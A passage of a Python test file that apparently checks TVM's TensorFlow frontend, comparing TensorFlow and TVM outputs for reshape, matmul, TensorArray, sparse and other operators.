_test_biasadd([4, 17, 17, 19], "NHWC")
_test_biasadd([4, 3, 3, 124], "NHWC")
def _test_forward_where(input_shape):
with tf.Graph().as_default():
dtype = tf.float32
t = tf.constant(
np.random.choice([0, 1, -2, 3, -1, 0.1, -0.2], size=input_shape).astype(dtype.name)
)
out = tf.where(t)
compare_tf_with_tvm([], [], out.name, mode="debug")
compare_tf_with_tvm([], [], out.name, mode="vm")
def test_forward_argwhere():
_test_forward_where((5,))
_test_forward_where((5, 5))
_test_forward_where((5, 5, 5))
_test_forward_where((5, 5, 5, 5))
_test_forward_where((5, 5, 5, 5, 5))
#######################################################################
# SpaceToBatchND
# --------------
def _test_space_to_batch_nd(input_shape, block_shape, paddings, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def _test_space_to_batch_nd_infer_paddings(input_shape, block_shape, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
padding_np = np.array([0, 1]).astype(np.int32).reshape((1, 2))
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
const1 = tf.constant(padding_np, dtype=tf.int32)
# make paddings an input to tf.transpose, but not an input to the graph,
# so it can be extracted with infer_value_simulated
paddings = tf.reverse(const1, axis=[-1])
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_space_to_batch_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/space-to-batch-n-d
_test_space_to_batch_nd(input_shape=[1, 2, 2, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 2, 2, 3], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 4, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(
input_shape=[2, 2, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/spacetobatch_op_test.py
_test_space_to_batch_nd(input_shape=[2, 3], block_shape=[2], paddings=[[1, 0]], dtype="float32")
_test_space_to_batch_nd(
input_shape=[2, 3, 2], block_shape=[2], paddings=[[1, 0]], dtype="float64"
)
_test_space_to_batch_nd_infer_paddings(input_shape=[2, 3, 2], block_shape=[2])
#######################################################################
# BatchToSpaceND
# --------------
def _test_batch_to_space_nd(input_shape, block_shape, crops, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.batch_to_space_nd(in_data, block_shape, crops)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_batch_to_space_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/batch-to-space-n-d
_test_batch_to_space_nd(input_shape=[4, 1, 1, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 1, 1, 3], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 2, 2, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(
input_shape=[8, 1, 3, 1], block_shape=[2, 2], crops=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/batchtospace_op_test.py
_test_batch_to_space_nd(
input_shape=[18, 2, 1, 2], block_shape=[2, 3], crops=[[1, 1], [0, 0]], dtype="float32"
)
_test_batch_to_space_nd(
input_shape=[20, 5, 8, 7], block_shape=[2, 2], crops=[[1, 1], [1, 1]], dtype="float64"
)
#######################################################################
# Reshape
# -------
def _test_reshape(data, out_shape):
""" One iteration of reshape operation with given data and out shape """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_with_call():
""" relay.expr.Call as shape """
data = np.zeros((6, 4, 2))
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
out_shape = tf.constant([1, 2, 3], dtype="int32")
out_shape = tf.multiply(out_shape, 2)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_like(data, shape_like):
""" A special case for reshape. """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
in_shape_like = array_ops.placeholder(shape=shape_like.shape, dtype=data.dtype)
out_shape = array_ops.shape(in_shape_like)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_symbolic(data, a_data, b_data):
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
a = array_ops.placeholder(shape=a_data.shape, dtype=a_data.dtype)
b = array_ops.placeholder(shape=b_data.shape, dtype=b_data.dtype)
newshape = tf.add(a, b)
out = array_ops.reshape(in_data, newshape)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[data, a_data, b_data], [in_data.name, a.name, b.name], out.name, mode=mode
)
def test_forward_reshape():
_test_reshape(np.arange(6.0), [2, 3])
_test_reshape(np.arange(6), [-1, 2])
_test_reshape(np.arange(6), [3, -1])
_test_reshape(np.arange(6), [-1])
_test_reshape_with_call()
_test_reshape_like(np.zeros((3, 6)), np.zeros((9, 2)))
_test_reshape_symbolic(np.arange(6.0), np.array([2, 0]), np.array([0, 3]))
_test_reshape_symbolic(np.arange(6), np.array([-1, 0]), np.array([0, 2]))
_test_reshape_symbolic(np.arange(6), np.array([3, 0]), np.array([3, -1]))
_test_reshape_symbolic(np.arange(6), np.array([0]), np.array([-1]))
#######################################################################
# DepthToSpace
# ------------
def _test_depthtospace(data, block_size):
""" One iteration of depth_to_space operation with given data and block size """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.depth_to_space(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "DepthToSpace:0")
def test_forward_depthtospace():
_test_depthtospace(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_depthtospace(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# SpaceToDepth
# ------------
def _test_spacetodepth(data, block_size):
""" One iteration of space_to_depth operation with given data and block size """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.space_to_depth(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "SpaceToDepth:0")
def test_forward_spacetodepth():
_test_spacetodepth(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_spacetodepth(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# Squeeze
# -------
def _test_squeeze(data, squeeze_dims=None):
""" One iteration of squeeze """
if squeeze_dims is None:
squeeze_dims = []
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
if squeeze_dims:
array_ops.squeeze(in_data, squeeze_dims)
else:
array_ops.squeeze(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Squeeze:0")
def test_forward_squeeze():
""" Squeeze """
# Nothing to squeeze.
_test_squeeze(np.arange(2).reshape((2)))
_test_squeeze(np.arange(6).reshape((2, 3)))
# Squeeze the middle element away.
_test_squeeze(np.arange(4).reshape((2, 1, 2)))
# Squeeze on both ends.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)))
# Positive squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [2, 4])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0, 4, 2])
# Negative squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-1])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5, -1])
#######################################################################
# TensorArray
# -----------
def test_tensor_array_write_read():
def run(dtype_str, infer_shape, element_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(
dtype=dtype, size=2, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.read(0)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, False, None)
run(dtype, False, tf.TensorShape([None, 2]))
run(dtype, True, None)
def test_tensor_array_scatter():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
if infer_shape:
element_shape = tf.TensorShape([tf.Dimension(None)])
else:
element_shape = None
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str), dtype=dtype)
indices = tf.constant([2, 1, 0])
ta1 = tf.TensorArray(
dtype=dtype, size=3, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.scatter(indices, t)
out0 = ta2.read(0)
out1 = ta2.read(1)
out2 = ta2.read(2)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_gather():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
gather_indices = tf.constant([1, 2])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.gather(gather_indices)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_split():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
out0 = ta2.read(0)
out1 = ta2.read(1)
out2 = ta2.read(2)
out3 = ta2.read(3)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_3:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_concat():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
t = ta2.concat()
out = tf.identity(t)
compare_tf_with_tvm([], [], ["Identity:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_size():
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(dtype=dtype, size=2, infer_shape=infer_shape)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.size()
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_stack():
def run(dtype_str, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.stack()
print(t1)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayStack/TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_unstack():
def run(dtype_str, input_shape, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.random.choice([0, 1, 2, 3], size=input_shape).astype(dtype.name))
ta1 = tf.TensorArray(dtype=dtype, infer_shape=infer_shape, size=input_shape[0])
ta2 = ta1.unstack(t)
out0 = ta2.size()
out1 = ta2.read(0)
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, (5,), False)
run(dtype, (5, 5), True)
run(dtype, (5, 5, 5), False)
run(dtype, (5, 5, 5, 5), True)
#######################################################################
# ConcatV2
# --------
def _test_concat_v2(shape1, shape2, dim):
""" One iteration of ConcatV2 """
with tf.Graph().as_default():
dtype = "float32"
in1 = tf.placeholder(shape=shape1, dtype=dtype, name="in1")
in2 = tf.placeholder(shape=shape2, dtype=dtype, name="in2")
array_ops.concat_v2([in1, in2], dim)
np_data1 = np.random.uniform(size=shape1).astype(dtype)
np_data2 = np.random.uniform(size=shape2).astype(dtype)
compare_tf_with_tvm([np_data1, np_data2], ["in1:0", "in2:0"], "ConcatV2:0")
def test_forward_concat_v2():
if tf.__version__ < LooseVersion("1.4.1"):
return
_test_concat_v2([2, 3], [2, 3], 0)
_test_concat_v2([10, 3, 5], [2, 3, 5], 0)
_test_concat_v2([2, 3], [2, 3], 1)
_test_concat_v2([5, 8], [5, 4], 1)
_test_concat_v2([2, 8, 5], [2, 8, 6], -1)
#######################################################################
# Sigmoid
# -------
def _test_sigmoid(data):
""" One iteration of sigmoid """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
sigmoid_out = math_ops.sigmoid(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Sigmoid:0")
def test_forward_sigmoid():
""" Sigmoid """
_test_sigmoid(np.random.uniform(size=(3, 4, 4, 3)).astype("float32"))
#######################################################################
# Argmin/Argmax
# -------------
def _test_argx(func, data, **kwargs):
with tf.Graph().as_default():
inp = array_ops.placeholder(shape=data.shape, dtype=data.dtype, name="c0")
func(inp, name="argx0", **kwargs)
compare_tf_with_tvm(data, "c0:0", "argx0:0")
def test_forward_argminmax():
for output_type in [tf.int64, tf.int32]:
for axis in [None, 0, 1, 2]:
data = np.random.uniform(size=(8, 4, 9)).astype("float32")
_test_argx(tf.argmax, data=data, axis=axis, output_type=output_type)
_test_argx(tf.argmin, data=data, axis=axis, output_type=output_type)
#######################################################################
# Variable
# --------
def _test_variable(data):
""" One iteration of a variable """
tf.reset_default_graph()
with tf.Graph().as_default():
input_op = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
input_tensor = array_ops.reshape(input_op, data.shape)
size = input_tensor.shape.dims[1]
with variable_scope.variable_scope("linear", reuse=None):
w = variable_scope.get_variable("w", shape=[size, size], dtype=input_tensor.dtype)
math_ops.matmul(input_tensor, w)
compare_tf_with_tvm(data, "Placeholder:0", "MatMul:0", init_global_variables=True)
def test_forward_variable():
"""Variable type op test"""
_test_variable(np.random.uniform(size=(32, 100)).astype("float32"))
@tvm.testing.parametrize_targets("llvm", "cuda")
def test_read_variable_op(target, dev):
""" Read Variable op test """
tf.reset_default_graph()
data = np.random.uniform(size=(32, 100)).astype("float32")
input_tensor = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
size = input_tensor.shape.dims[1]
var_data = np.random.uniform(-5, 5, size=[size, size]).astype(np.float32)
input_var = tf.Variable(var_data, name="var1", use_resource=True)
math_ops.matmul(input_tensor, input_var)
out_name = ["MatMul:0"]
out_node = ["MatMul"]
in_name = ["Placeholder:0"]
in_node = ["Placeholder"]
in_data = [data]
with tf.Session() as sess:
sess.run(variables.global_variables_initializer())
final_graph_def = sess.graph.as_graph_def(add_shapes=True)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
shape_dict = {e: i.shape for e, i in zip(in_name, in_data)}
with pytest.raises(Exception) as execinfo:
mod, params = relay.frontend.from_tensorflow(
final_graph_def, layout=None, shape=shape_dict, outputs=None
)
assert execinfo.value.args[0].startswith("Graph is not frozen. Provide a frozen graph")
# Now convert the variables to constant and run inference on the converted graph
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=target,
out_names=out_name,
num_output=len(out_name),
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-4, rtol=1e-5)
sess.close()
#######################################################################
# MatMul, BatchMatMul, BatchMatMulV2
# ----------------------------------
def _test_matmul(i, j, k, dtype, outer=None):
""" One iteration of matmul """
A_shape_init = [i, j]
B_shape_init = [j, k]
for transpose_a in [False, True]:
for transpose_b in [False, True]:
outer = outer or []
A_shape = outer + (A_shape_init[::-1] if transpose_a else A_shape_init)
B_shape = outer + (B_shape_init[::-1] if transpose_b else B_shape_init)
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, transpose_a=transpose_a, transpose_b=transpose_b)
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([A_np, B_np], [A.name, B.name], result.name)
def test_forward_matmul():
""" MatMul op test"""
_test_matmul(1, 3, 6, "int32")
_test_matmul(5, 3, 1, "float64")
def _test_batch_matmul(A_shape, B_shape, dtype, adjoint_a=False, adjoint_b=False):
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([A_np, B_np], [A.name, B.name], result.name)
def _test_batch_matmul_dynamic(
A_shape, B_shape, A_np_shape, B_np_shape, dtype, adjoint_a=False, adjoint_b=False
):
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_np_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_np_shape).astype(dtype)
# for now, in TOPI, only cublas's implementation support dynamic shape
# TODO add more backends support in TOPI
compare_tf_with_tvm(
[A_np, B_np], [A.name, B.name], result.name, mode="vm", targets=["cuda -libs=cublas"]
)
def test_forward_batch_matmul():
""" TF op BatchMatMul, BatchMatMulV2 test"""
_test_batch_matmul((3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul((3, 5, 4), (3, 4, 5), "float32", True, True)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "int32", True, False)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "float32", False, True)
_test_batch_matmul((2, 3, 4, 5, 6), (2, 3, 4, 6, 5), "int32")
_test_batch_matmul((1, 2, 3, 4, 5, 6), (1, 2, 3, 4, 6, 5), "float32", True, True)
_test_batch_matmul((3, 4, 5, 6), (3, 4, 5, 6), "int32", True, False)
_test_batch_matmul((2, 3, 4, 2, 3, 4, 5, 6), (2, 3, 4, 2, 3, 4, 5, 6), "float32", False, True)
@tvm.testing.requires_cuda
def test_forward_batch_matmul_dynamic():
_test_batch_matmul_dynamic((None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "float32", True, True
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "int32", True, False
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "float32", False, True
)
_test_batch_matmul_dynamic(
(None, 4, 5, 6), (None, 4, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
_test_batch_matmul_dynamic(
(None, None, 5, 6), (None, None, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
_test_batch_matmul_dynamic(
(None, None, None, 5, 6),
(None, None, None, 6, 5),
(2, 3, 4, 5, 6),
(2, 3, 4, 6, 5),
"float32",
)
#######################################################################
# SparseTensorDenseMatMul
# ----------------------------------
def _test_sparse_dense_matmul(indices, values, A_inp_shape, B_inp_shape, dtype, flip=False):
""" One iteration of sparse_dense_matmul """
for adjoint_a in [False, True]:
for adjoint_b in [False, True]:
A_shape = A_inp_shape[::-1] if adjoint_a else A_inp_shape
B_shape = B_inp_shape[::-1] if adjoint_b else B_inp_shape
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
if flip:
result = tf.sparse.sparse_dense_matmul(
B, A_sp, adjoint_a=adjoint_b, adjoint_b=adjoint_a
)
else:
result = tf.sparse.sparse_dense_matmul(
A_sp, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b
)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name)
def test_forward_sparse_dense_matmul():
""" sparse_dense_matmul op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [4, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [7, 9], [9, 5], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [4, 3], [3, 4], "float32", True)
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32", True)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32", True
)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [9, 5], [7, 9], "float32", True
)
#######################################################################
# SparseFillEmptyRows
# ------------
def _test_sparse_fill_empty_rows(indices_np, values_np, dense_shape_np, default_value_int, use_dyn):
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=(None), dtype=dense_shape_np.dtype, name="dense_shape"
)
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=dense_shape_np.shape, dtype=dense_shape_np.dtype, name="dense_shape"
)
default_value = tf.placeholder(shape=(), dtype=values_np.dtype, name="default_value")
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=dense_shape)
_ = tf.sparse.fill_empty_rows(sp_input, default_value, name="sparse_fill_empty_rows")
compare_tf_with_tvm(
[indices_np, values_np, dense_shape_np, default_value_int],
[indices.name, values.name, dense_shape.name, default_value.name],
[
"sparse_fill_empty_rows/SparseFillEmptyRows:0",
"sparse_fill_empty_rows/SparseFillEmptyRows:1",
"sparse_fill_empty_rows/SparseFillEmptyRows:2",
],
mode="vm",
)
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int",
[
(
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[0, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1, 1], [1, 3, 1], [2, 0, 5], [3, 1, 6]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([7, 7, 7], dtype=np.int64),
5,
),
(
np.array([[1], [2]], dtype=np.int64),
np.array([7, 8], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 3), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([9, 3, 7], dtype=np.int64),
100,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_fill_empty_rows(
sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
):
""" sparse_fill_empty_rows op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_fill_empty_rows(
sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
)
#######################################################################
# SparseReshape
# ------------
def _test_sparse_reshape(indices_np, values_np, prev_shape_np, new_shape_np, use_dyn=False):
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(shape=(None), dtype=prev_shape_np.dtype, name="prev_shape")
new_shape = tf.placeholder(shape=(None), dtype=new_shape_np.dtype, name="new_shape")
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(
shape=prev_shape_np.shape, dtype=prev_shape_np.dtype, name="prev_shape"
)
new_shape = tf.placeholder(
shape=new_shape_np.shape, dtype=new_shape_np.dtype, name="new_shape"
)
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=prev_shape)
_ = tf.sparse.reshape(sp_input, new_shape, name="sparse_reshape")
compare_tf_with_tvm(
[indices_np, values_np, prev_shape_np, new_shape_np],
[indices.name, values.name, prev_shape.name, new_shape.name],
["sparse_reshape:0", "sparse_reshape:1", "sparse_reshape/Identity:0"],
mode="vm",
)
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np",
[
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, -1], dtype=np.int64),
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, 2], dtype=np.int64),
),
(
np.ones((0, 2), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([3, 6], dtype=np.int64),
np.array([-1, 2], dtype=np.int64),
),
(
np.array([[0, 0, 0], [0, 0, 1], [0, 1, 0], [1, 0, 0], [1, 2, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
